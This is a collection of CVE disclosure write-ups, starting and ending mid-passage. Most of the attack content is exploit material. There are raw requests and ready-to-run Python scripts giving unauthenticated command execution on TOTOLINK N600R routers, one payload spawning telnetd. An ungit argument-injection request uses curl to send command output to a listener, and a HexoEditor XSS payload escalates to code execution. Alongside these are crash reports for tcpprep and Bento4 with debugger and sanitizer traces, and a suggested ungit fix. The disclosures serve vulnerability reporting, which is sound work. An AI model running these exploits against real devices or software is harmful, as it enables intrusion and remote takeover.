	"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:94.0) Gecko/20100101 Firefox/94.0",  
	"Accept-Language":"en-US,en;q=0.5",  
	"Accept-Encoding":"gzip, deflate",  
	"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",  
	"X-Requested-With":"XMLHttpRequest",  
	"Origin":"http://%s:%s"%(ip,port),  
}  
data={  
	"topicurl":"setting/setDiagnosisCfg",  
	"actionFlag":"1",  
	"ipDoamin":"www.baidu.com\\n{}\\n".format(command)  
}  
  
  
print requests.post(url,headers\=headers,data=json.dumps(data)).text  

**verification**

![image-20220221190506864](https://raw.githubusercontent.com/doudoudedi/blog-img/master/img/image-20220221190506864.png)

**Vulnerability3****Detail**

​ In TOTOLINK N600R equipment, command injection at the change language of the login interface, which can lead to unauthenticated RCE

![image-20211111141004575](https://raw.githubusercontent.com/doudoudedi/blog-img/master/img/image-20211111141004575.png)

**POC**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

POST /cgi-bin/cstecgi.cgi HTTP/1.1  
Host: 192.168.0.1  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:94.0) Gecko/20100101 Firefox/94.0  
Accept: \*/\*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 79  
Origin: http://192.168.0.1  
Connection: close  
Referer: http://192.168.0.1/title.asp  
  
{"topicurl":"setting/setLanguageCfg","langType":"cn;telnetd${IFS}\-p${IFS}23;"}	  

**EXP**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  
26  
27  
28  
29  
30  

import sys  
import requests  
import json  
try:  
	ip\=sys.argv\[1\]  
	port\=sys.argv\[2\]  
	command\=sys.argv\[3\]  
except:  
	print "nonono! cant't do this"  
	print "please use python exp.py \[ip\] \[port\] \[command\]"  
	exit()  
url\="http://%s:%s/cgi-bin/cstecgi.cgi"%(ip,port)  
  
  
  
headers={  
	"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:94.0) Gecko/20100101 Firefox/94.0",  
	"Accept-Language":"en-US,en;q=0.5",  
	"Accept-Encoding":"gzip, deflate",  
	"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",  
	"X-Requested-With":"XMLHttpRequest",  
	"Origin":"http://%s:%s"%(ip,port),  
	}  
data={  
	"topicurl":"setting/setLanguageCfg",  
	"langType":"cn;{};".format(command)  
}  
  
  
requests.post(url,headers\=headers,data=json.dumps(data))  

**verification**

![image-20220221180334179](https://raw.githubusercontent.com/doudoudedi/blog-img/master/img/image-20220221180334179.png)

**Vulnerability4****Detail**

​ In TOTOLINK N600R equipment,Command injection at setting/NTPSyncWithHost can lead to unauthenticated RCE

![image-20211111141412938](https://raw.githubusercontent.com/doudoudedi/blog-img/master/img/image-20211111141412938.png)

**POC**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  

POST /cgi-bin/cstecgi.cgi HTTP/1.1  
Host: 192.168.0.1  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:94.0) Gecko/20100101 Firefox/94.0  
Accept: \*/\*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 83  
Origin: http://192.168.0.1  
Connection: close  
Referer: http://192.168.0.1/adm/ntp.asp?timestamp=1636598045521  
Cookie: SESSION\_ID=2:1609945786:2  
  
{"topicurl":"setting/NTPSyncWithHost","hostTime":"2021-11-11 10:34:09\\"\\nreboot\\n\\""}  

**EXP**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  
26  
27  
28  
29  
30  

import sys  
import requests  
import json  
try:  
	ip\=sys.argv\[1\]  
	port\=sys.argv\[2\]  
	command\=sys.argv\[3\]  
except:  
	print "nonono! cant't do this"  
	print "please use python exp.py \[ip\] \[port\] \[command\]"  
	exit()  
url\="http://%s:%s/cgi-bin/cstecgi.cgi"%(ip,port)  
  
  
  
headers={  
	"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:94.0) Gecko/20100101 Firefox/94.0",  
	"Accept-Language":"en-US,en;q=0.5",  
	"Accept-Encoding":"gzip, deflate",  
	"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",  
	"X-Requested-With":"XMLHttpRequest",  
	"Origin":"http://%s:%s",  
}  
data={  
	"topicurl":"setting/NTPSyncWithHost",  
	"hostTime":"2021-11-11 10:34:09\\"\\n{}\\n\\"".format(command)  
}  
  
  
requests.post(url,headers\=headers,data=json.dumps(data))  

**verification**

![image-20220221190847543](https://raw.githubusercontent.com/doudoudedi/blog-img/master/img/image-20220221190847543.png)

CVE-2022-26189: TOTOLINK_N600R_Command_Injection

tcpprep v4.4.1 has a reachable assertion (assert(l2len > 0)) in packet2tree() at tree.c in tcpprep v4.4.1.

**Describe the bug**  
The assertion `assert(l2len > 0);` in packet2tree() at tree.c is reachable when the user uses tcpprep to open a crafted pcap file.  
The variable `l2len` is assigned in get\_l2len\_protocol() at get.c.

res = get\_l2len\_protocol(data,

pkt\_len,

datalink,

&ether\_type,

&l2len,

&l2offset,

&vlan\_offset);

if (res == -1)

goto len\_error;

node = new\_tree();

assert(l2len > 0);

However, when the `datalink` is `DLT_RAW` or `DLT_JUNIPER_ETHER`, `l2len` is assigned with 0, and the assertion is triggered.

\*l2len = 0;

\*l2offset = 0;

\*vlan\_offset = 0;

switch (datalink) {

case DLT\_RAW:

if (datalen == 0)

return -1;

if ((pktdata\[0\] >> 4) == 4)

\*protocol = ETHERTYPE\_IP;

else if ((pktdata\[0\] >> 4) == 6)

\*protocol = ETHERTYPE\_IP6;

break;

case DLT\_JUNIPER\_ETHER:

**To Reproduce**  
Steps to reproduce the behavior:

1.  Get the Tcpreplay source code (master 09f0774) and compile it.
2.  Run command: `$ tcpprep --auto=bridge --pcap=$POC --cachefile=/dev/null`  
    The POC file could be downloaded here:  
    POC\_file

**Expected behavior**  
Program reports assertion failure and is terminated.

**Screenshots**  
![image](https://user-images.githubusercontent.com/22045841/154013948-2d9bd5b8-de28-4c3a-b808-022197c200f4.png)

The GDB report:

    Breakpoint 6, packet2tree (data=0x7ffff7ef8010 "@", len=33, datalink=12) at ../../code/src/tree.c:733
    733         res = get_l2len_protocol(data,
    (gdb) p datalink 
    $8 = 12
    (gdb) n
    741         if (res == -1)
    (gdb) 
    744         node = new_tree();
    (gdb) 
    
    Breakpoint 1, packet2tree (data=0x7ffff7ef8010 "@", len=33, datalink=<optimized out>) at ../../code/src/tree.c:746
    746         assert(l2len > 0);
    (gdb) p l2len 
    $9 = 0
    (gdb) c
    Continuing.
    tcpprep: ../../code/src/tree.c:746: tcpr_tree_t *packet2tree(const u_char *, const int, int): Assertion `l2len > 0' failed.
    
    Program received signal SIGABRT, Aborted.
    0x00007ffff7194438 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54
    54      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    

**System (please complete the following information):**

*   OS: Ubuntu
*   OS version: 16.04, 64 bit
*   Tcpreplay Version: 4.4.1 (master 09f0774)

CVE-2022-25484: [Bug] Reachable assertion in packet2tree() · Issue #715 · appneta/tcpreplay

Bento4 1.6.0-639 has a heap-based buffer over-read in the AP4_HvccAtom class, a related issue to CVE-2018-14531.

**brief description**

There is a buffer overflow in AP4\_HvccAtom, can be triggered via mp4tag + ASan.

**To reproduce**

    mkdir build && pushd build
    CC=clang CFLAGS="-fsanitize=address" CXX=clang CXXFLAGS="-fsanitize=address" cmake .. && make -j$(nproc)
    ./mp4tag --list-symbols --list-keys --show-tags $POC
    

**output**

    =================================================================
    ==2542087==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6030000003e6 at pc 0x0000004cfa61 bp 0x7ffffec70440 sp 0x7ffffec70430
    READ of size 1 at 0x6030000003e6 thread T0
        #0 0x4cfa60 in AP4_HvccAtom::AP4_HvccAtom(unsigned int, unsigned char const*) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4cfa60)
        #1 0x4cc7e5 in AP4_HvccAtom::Create(unsigned int, AP4_ByteStream&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4cc7e5)
        #2 0x446dc2 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x446dc2)
        #3 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b)
        #4 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf)
        #5 0x5779a8 in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x5779a8)
        #6 0x58e0bb in AP4_VisualSampleEntry::AP4_VisualSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x58e0bb)
        #7 0x58f042 in AP4_AvcSampleEntry::AP4_AvcSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x58f042)
        #8 0x44241c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44241c)
        #9 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b)
        #10 0x5bbbb7 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x5bbbb7)
        #11 0x5bafbd in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x5bafbd)
        #12 0x445b0e in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x445b0e)
        #13 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b)
        #14 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf)
        #15 0x47f58d in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47f58d)
        #16 0x47df78 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47df78)
        #17 0x44c562 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44c562)
        #18 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b)
        #19 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf)
        #20 0x47f58d in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47f58d)
        #21 0x47df78 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47df78)
        #22 0x44c562 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44c562)
        #23 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b)
        #24 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf)
        #25 0x47f58d in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47f58d)
        #26 0x47df78 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47df78)
        #27 0x44c562 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44c562)
        #28 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b)
        #29 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf)
        #30 0x47f58d in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47f58d)
        #31 0x5f6668 in AP4_TrakAtom::AP4_TrakAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x5f6668)
        #32 0x7a7726 in AP4_TrakAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x7a7726)
        #33 0x444cfd in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x444cfd)
        #34 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b)
        #35 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf)
        #36 0x47f58d in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47f58d)
        #37 0x50703e in AP4_MoovAtom::AP4_MoovAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x50703e)
        #38 0x7a75e6 in AP4_MoovAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x7a75e6)
        #39 0x4446b7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4446b7)
        #40 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b)
        #41 0x44e49a in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44e49a)
        #42 0x4baaee in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4baaee)
        #43 0x4bc068 in AP4_File::AP4_File(AP4_ByteStream&, bool) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4bc068)
        #44 0x4090ab in main (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4090ab)
        #45 0x7f9977c8b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #46 0x4078bd in _start (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4078bd)
    
    0x6030000003e6 is located 0 bytes to the right of 22-byte region [0x6030000003d0,0x6030000003e6)
    allocated by thread T0 here:
        #0 0x907b17 in operator new[](unsigned long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x907b17)
        #1 0x4a2314 in AP4_DataBuffer::AP4_DataBuffer(unsigned int) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4a2314)
        #2 0x4cc5dc in AP4_HvccAtom::Create(unsigned int, AP4_ByteStream&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4cc5dc)
        #3 0x446dc2 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x446dc2)
        #4 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b)
        #5 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf)
        #6 0x5779a8 in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x5779a8)
        #7 0x58e0bb in AP4_VisualSampleEntry::AP4_VisualSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x58e0bb)
        #8 0x58f042 in AP4_AvcSampleEntry::AP4_AvcSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x58f042)
        #9 0x44241c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44241c)
        #10 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b)
        #11 0x5bbbb7 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x5bbbb7)
        #12 0x5bafbd in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x5bafbd)
        #13 0x445b0e in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x445b0e)
        #14 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b)
        #15 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf)
        #16 0x47f58d in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47f58d)
        #17 0x47df78 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47df78)
        #18 0x44c562 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44c562)
        #19 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b)
        #20 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf)
        #21 0x47f58d in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47f58d)
        #22 0x47df78 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47df78)
        #23 0x44c562 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44c562)
        #24 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b)
        #25 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf)
        #26 0x47f58d in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47f58d)
        #27 0x47df78 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47df78)
        #28 0x44c562 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44c562)
        #29 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4cfa60) in AP4_HvccAtom::AP4_HvccAtom(unsigned int, unsigned char const*)
    Shadow bytes around the buggy address:
      0x0c067fff8020: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa
      0x0c067fff8030: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00
      0x0c067fff8040: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
      0x0c067fff8050: fd fd fd fa fa fa 00 00 04 fa fa fa 00 00 00 fa
      0x0c067fff8060: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00
    =>0x0c067fff8070: 00 fa fa fa 00 00 00 fa fa fa 00 00[06]fa fa fa
      0x0c067fff8080: 00 00 06 fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c067fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c067fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c067fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c067fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2542087==ABORTING
    

**System**

Ubuntu 20.04  
clang 12.0.1  
Bento4 latest commit 46dd88c

**Acknowledgement**

nipc

**POC**

poc.zip

CVE-2022-27607: [BUG] Heap buffer overflow in AP4_HvccAtom, mp4tag · Issue #677 · axiomatic-systems/Bento4

The package ungit before 1.5.20 are vulnerable to Remote Code Execution (RCE) via argument injection. The issue occurs when calling the /api/fetch endpoint. User controlled values (remote and ref) are passed to the git fetch command. By injecting some git options it was possible to get arbitrary command execution.

source: snyk.io

**Vulnerability: Remote Code Execution****Affected Version: \*****Technical Details:**

It's possible to get remote code execution via argument injection.

The issue occurs when calling the /api/fetch endpoint. The user input is passed to the git subcommand fetch. Even if a safe API like spawn is used to execute shell commands (

const gitProcess \= child\_process.spawn(gitBin, args.commands, procOpts);

), in this specific case it's still possible to run arbitrary commands via argument injection.

The fetch subcommand accepts a special argument --upload-pack (https://git-scm.com/docs/git-fetch#Documentation/git-fetch.txt---upload-packltupload-packgt). Since the user controls two values provided to the fetch git subcommand (remote and ref), it is possible to execute arbitrary commands by providing the remote value to be --upload-pack="command to execute". The command executed will be similar to the following:

git fetch --upload-pack="command to execute" foobar

Here is the code that accepts these values:

//

'fetch',

req.body.remote,

req.body.ref ? req.body.ref : '',

config.autoPruneOnFetch ? '--prune' : '',

app.post(  
`${exports.pathPrefix}/fetch`,  
ensureAuthenticated,  
ensurePathExists,  
ensureValidSocketId,  
(req, res) => {  
// Allow a little longer timeout on fetch (10min)  
if (res.setTimeout) res.setTimeout(tenMinTimeoutMs);

      const task = gitPromise({
        commands: credentialsOption(req.body.socketId, req.body.remote).concat([
          'fetch',
          req.body.remote,
          req.body.ref ? req.body.ref : '',
          config.autoPruneOnFetch ? '--prune' : '',
        ]),
        repoPath: req.body.path,
        timeout: tenMinTimeoutMs,
      });
    
      jsonResultOrFailProm(res, task).finally(emitGitDirectoryChanged.bind(null, req.body.path));
    }
    

);

**Potential Fix**

A possible remediation to fix this issue could be to add -- (see here for more information about it https://git-scm.com/docs/gitcli/2.25.0#\_description) before the user provided values (it's just a suggestion):

        commands: credentialsOption(req.body.socketId, req.body.remote).concat([
          'fetch',
          config.autoPruneOnFetch ? '--prune' : '',
          '--',
          req.body.remote,
          req.body.ref ? req.body.ref : ''
        ]),
    

**Proof Of Concept/Steps to Reproduce**

Install ungit and setup a project (I used ungit repo itself)  
cd /home/ubuntu/poc/  
npm install -g ungit  
git clone https://github.com/FredrikNoren/ungit.git  
cd ungit/  
ungit  
the project will be available at http://localhost:8448/#/repository?path=/home/ubuntu/poc/ungit  
RCE Exploitation  
setup a listener for accepting incoming connections:  
nc -nvlp 8000

run the following curl command to get the output of the id command:  
curl -d '{"path":"/home/ubuntu/poc/ungit","remote":"--upload-pack=curl http://localhost:8000/ --data "$(id)"","ref":"foobar","socketId":1}' -H "Content-Type: application/json" -X POST http://localhost:8448/api/fetch

This is the same request sent:

    POST /api/fetch HTTP/1.1
    Host: localhost:8448
    Content-Length: 134
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    Accept: application/json
    Content-Type: application/json
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    sec-ch-ua-platform: "Linux"
    Origin: http://localhost:8448/
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: [http://localhost:8448/
    Accept-Encoding](http://localhost:8448/%0DAccept-Encoding): gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"path":"/home/ubuntu/poc/ungit","remote":"--upload-pack=curl http://localhost:8000/ --data \"$(id)\"",
    "ref":"foobar",
    "socketId":1}

CVE-2022-25766: Fix potential remote code exec by jung-kim · Pull Request #1510 · FredrikNoren/ungit

HexoEditor 1.1.8 is affected by Cross Site Scripting (XSS). By putting a common XSS payload in a markdown file, if opened with the app, will execute several times.

Vulnerability: XSS to code execution  
Version: 1.1.8  
Initially reported: January 3rd, 2018  
Tested on 16.04.1-Ubuntu

    <s <onmouseover="alert(1)"> <s onmouseover="var {shell} = require('electron');
    shell.openExternal('file:/etc/passwd'); alert('XSS to code execution')">Hallo</s>
    

then, if you now hover over the word Hallo, the '/etc/passwd' file and an alert with words “XSS to  
